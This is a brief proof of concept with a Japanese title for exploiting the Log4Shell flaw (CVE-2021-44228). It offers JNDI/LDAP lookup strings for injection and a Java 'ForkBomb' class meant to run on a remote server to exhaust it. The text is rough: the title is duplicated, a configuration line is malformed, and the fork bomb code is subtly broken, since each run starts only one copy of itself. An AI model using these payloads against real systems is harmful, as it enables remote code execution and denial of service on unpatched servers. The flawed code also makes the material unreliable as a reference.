
💣💥💀 概念実証: CVE-2021-44228の脆弱性を利用したリモートサーバー上でのフォーク爆弾起動の例
💣💥💀 Proof of Concept: CVE-2021-44228 の脆弱性を利用してリモートサーバー上でフォーク爆弾を実行する例
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
com.sun.jndi.ldap.object.trustURLCodebase = true)public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}